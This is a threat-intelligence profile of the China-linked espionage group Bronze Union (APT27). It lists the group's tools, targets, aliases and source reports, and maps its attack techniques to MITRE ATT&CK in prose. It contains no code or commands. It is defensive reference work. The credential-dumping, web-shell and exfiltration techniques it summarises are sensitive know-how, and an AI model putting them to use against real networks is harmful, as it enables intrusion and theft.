Contents
General description
Bronze Union is an APT group that has been active since at least 2010. Different researchers all believe that the group originated in China. It widely uses watering hole techniques for initial penetration, in particular, infection of websites visited by victims, as well as phishing and network service vulnerabilities. The group specializes in cyber-espionage, primarily in networks of government agencies, defense enterprises and political organizations. In 2020, some researchers (including specialists from the PT Expert Secutity Center) suggested that the group had become financially motivated.
Objectives
- Espionage
- Cash extortion
Tools
- AspxSpy/ASPXTool webshell
- Antak webshell
- China Chopper webshell
- Clambling
- Dnstunclient
- Gh0st RAT
- HTran
- HttpBrowser
- Hunter
- HyperBro
- Mimikatz/Wrapikatz
- NBTscan
- OwaAuth
- PlugX/Korplug
- Polpo
- PsExec
- SysUpdate
- TwoFace
- Windows Credentials Editor
- ZxShell
- gsecdump
- pwdump
Target sectors
- Aerospace industry
- Analytical centers
- Defense industry
- State sector
- Information technologies
- Media
- Education
- Industrial sector
Target countries
- Australia
- United Kingdom
- Vietnam
- Hong Kong
- Israel
- India
- Iran
- Spain
- Canada
- China
- Mongolia
- Russia
- США
- Taiwan
- Thailand
- Tibet
- Turkey
- Philippines
- South Korea
- Japan
Alternative group names
- LuckyMouse
- Emissary Panda
- APT27
- Iron Tiger
- TG-3390
- TEMP.Hippo
- Group 35
- ZipToken
Reports by Positive Technologies and other researchers
- https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/
- https://arstechnica.com/information-technology/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
- https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2015/2015.09.17.Operation_Iron_Tiger/wp-operation-iron-tiger.pdf
- https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
- https://www.secureworks.com/research/bronze-union
- https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/
- https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/
- https://securelist.com/luckymouse-hits-national-data-center/86083/
- https://securelist.com/luckymouse-ndisproxy-driver/87914/
- https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox
- https://securelist.com/apt-trends-report-q1-2019/90643/
- https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/
MITRE ATT&CK techniques, used by the group
Technique ID | Technique name | Description |
---|---|---|
Initial Access | ||
T1078 | Valid Accounts | Bronze Union obtained legitimate credentials using various methods and used them for further lateral movement in the victim's networks. |
T1133 | External Remote Services | During the operation, Bronze Union found and used VPN profiles to access the network using external VPN services. In addition, the group received OWA credentials during the invasion, which were then used to restore access to the network after it was lost. |
T1189 | Drive-by Compromise | Bronze Union widely used strategic web compromises to infect their victims. |
T1190 | Exploit Public-Facing Application | Bronze Union exploited vulnerabilities of network services as the main vector of infection. |
T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain | Bronze Union used infected installers and a compromised Able Desktop update system to spread malware. |
T1199 | Trusted Relationship | For the initial penetration into the organization, Bronze Union sent emails from hacked email accounts of a trusted company. |
T1566.001 | Phishing: Spearphishing Attachment | Bronze Union sent targeted phishing emails with decoy attachments. |
Execution | ||
T1047 | Windows Management Instrumentation | Bronze Union used WMI to run malware. |
T1053.002 | Scheduled Task/Job: At (Windows) | Bronze Union used the at command to schedule tasks for executing SFX-RAR archives that install HTTPBrowser or PlugX malware. |
T1059.001 | Command and Scripting Interpreter: PowerShell | Bronze Union used PowerShell to execute commands. |
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Bronze Union used a command interpreter to execute commands. |
T1106 | Native API | Bronze Union can use the CreateProcess and ShellExecute APIs to launch new processes. |
T1203 | Exploitation for Client Execution | Bronze Union exploited vulnerabilities CVE-2019-0604 in Microsoft SharePoint and CVE-2017-11882 in Equation Editor. |
Execution | ||
T1204.002 | User Execution: Malicious File | The Able Desktop installer infected with Bronze Union malware was launched by the user. |
Persistence | ||
T1505.003 | Server Software Component: Web Shell | Bronze Union used various web shells, including ASPXTool, Antak, and China Chopper. |
T1543.003 | Create or Modify System Process: Windows Service | Bronze Union malware can create a new service with the name specified in the configuration to gain persistence in the system. |
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Bronze Union malware can gain persistence in the system through the registry key Software\Microsoft\Windows\CurrentVersion\Run. |
Privilege Escalation | ||
T1068 | Exploitation for Privilege Escalation | Bronze Union used the vulnerability CVE-2014-6324 to escalate privileges. |
T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | Bronze Union used a public UAC bypass technique to escalate privileges. |
Defense Evasion | ||
T1027 | Obfuscated Files or Information | Bronze Union malware can encrypt the payload using XOR, deobfuscate auxiliary code encoded using the shikata_ga_nai encoder, and uncompress the payload that was compressed using the LZNT1 algorithm. |
T1055.012 | Process Injection: Process Hollowing | Bronze Union malware can create a svchost.exe process and inject a payload into it. |
T1070.004 | Indicator Removal on Host: File Deletion | Bronze Union deleted existing logs and archives with data from the victim's computers. |
T1070.005 | Indicator Removal on Host: Network Share Connection Removal | Bronze Union disabled network folders after exfiltration of files. |
T1112 | Modify Registry | Bronze Union malware can create a new registry key in HKEY_CURRENT_USER\Software\Classes\. |
T1140 | Deobfuscate/Decode Files or Information | During execution, Bronze Union malware can deobfuscate the auxiliary code encoded using the shikata_ga_nai encoder and uncompress the payload that was compressed using the LZNT1 algorithm. |
T1562.002 | Impair Defenses: Disable Windows Event Logging | Bronze Union used appcmd.exe to disable logging on the victim's server. |
T1564.001 | Hidden Files and Directories | Bronze Union stored the collected information in hidden directories and files. |
T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking | Bronze Union used the DLL search order hijacking technique to execute the payload. |
T1574.002 | Hijack Execution Flow: DLL Side-Loading | Bronze Union used legitimate executable files vulnerable to DLL Side Loading (in particular, components of Kaspersky Lab, Symantec, and ESET products) to upload their DLLs. These DLLs, in turn, have the functionality of uploading and running shellcode. |
Credential Access | ||
T1003.001 | OS Credential Dumping: LSASS Memory | Bronze Union used Wrapikatz (a modified version of Mimikatz) to collect credentials, including from domain controllers. |
T1003.002 | OS Credential Dumping: Security Account Manager | Bronze Union used gsecdump to collect credentials, including from domain controllers. |
T1003.004 | OS Credential Dumping: LSA Secrets | Bronze Union used gsecdump to collect credentials, including from domain controllers. |
T1056.003 | Input Capture: Web Portal Capture | Bronze Union installed the code for logging credentials on Microsoft Exchange servers. |
Discovery | ||
T1012 | Query Registry | Bronze Union malware can read and decrypt the values stored in the registry. |
T1016 | System Network Configuration Discovery | Bronze Union used the nbtscan utility to search for vulnerable systems. |
T1018 | Remote System Discovery | Bronze Union used the net view command. |
T1046 | Network Service Scanning | Bronze Union used the Hunter utility to detect vulnerable network services. |
T1049 | System Network Connections Discovery | Bronze Union used the net use command for internal network reconnaissance, as well as quser.exe to determine the active RDP sessions in the victim's system. |
T1082 | System Information Discovery | Bronze Union malware can collect information about the system. |
T1083 | File and Directory Discovery | Bronze Union looked for sensitive documents with the .pdf, .ppt, .xls, and .doc extensions. |
T1087.001 | Account Discovery: Local Account | Bronze Union group used the net user command to obtain a list of accounts. |
T1120 | Peripheral Device Discovery | Bronze Union malware can search for removable disks in the system. |
Lateral Movement | ||
T1021.006 | Remote Services: Windows Remote Management | Bronze Union used WinRM to gain remote access to compromised systems. |
T1210 | Exploitation of Remote Services | Bronze Union exploited the MS17-010 vulnerability to move laterally to other systems on the network. |
Collection | ||
T1005 | Data from Local System | Bronze Union ran a console command to create an archive of files of the types that were of interest to them from the victim's user directories. |
T1056.001 | Input Capture: Keylogging | Bronze Union used the reconnaissance framework SanBox and the corresponding functionality in the LuckyBack malware to capture keystrokes. |
T1074.001 | Data Staged: Local Data Staging | Bronze Union saved encrypted archives locally for further exfiltration. |
T1074.002 | Data Staged: Remote Data Staging | Bronze Union moved encrypted archives to Internet-accessible servers previously compromised using China Chopper for further exfiltration. |
T1113 | Screen Capture | Bronze Union malware can support screen capture. |
T1119 | Automated Collection | Bronze Union ran a console command to create an archive of files of the types that were of interest to them from the victim's user directories. |
T1560.001 | Archive Collected Data: Archive via Utility | Bronze Union used RAR to compress and encrypt files with a password before exfiltrating them. |
Command And Control | ||
T1071.001 | Application Layer Protocol: Web Protocols | Bronze Union malware can use the HTTP protocol to interact with the C2. |
T1090.001 | Proxy: Internal Proxy | BronzeUnion malware (Polpo) can act as a proxy. |
T1105 | Ingress Tool Transfer | After re-establishing access to the victim's network, Bronze Union downloaded tools (such as gsecdump and WCE), which were temporarily stored on websites compromised by the group, but not previously used. |
T1132.001 | Data Encoding: Standard Encoding | BronzeUnion malware (Polpo) encodes encrypted data using Base64. |
T1573.001 | Encrypted Channel: Symmetric Cryptography | Bronze Union malware (Polpo) encrypts the transmitted data using AES. |
Exfiltration | ||
T1030 | Data Transfer Size Limits | Bronze Union divided the RAR archives for exfiltration into parts. |
T1041 | Exfiltration Over C2 Channel | Bronze Union (Polpo) transmits the collected data to the C2 server. |
T1052.001 | Exfiltration Over Physical Medium: Exfiltration over USB | Bronze Union malware (Information Collector) moves files inside the network using removable disks. |
T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Bronze Union malware (StartServiceTool) uses Dropbox to exfiltrate the collected data. |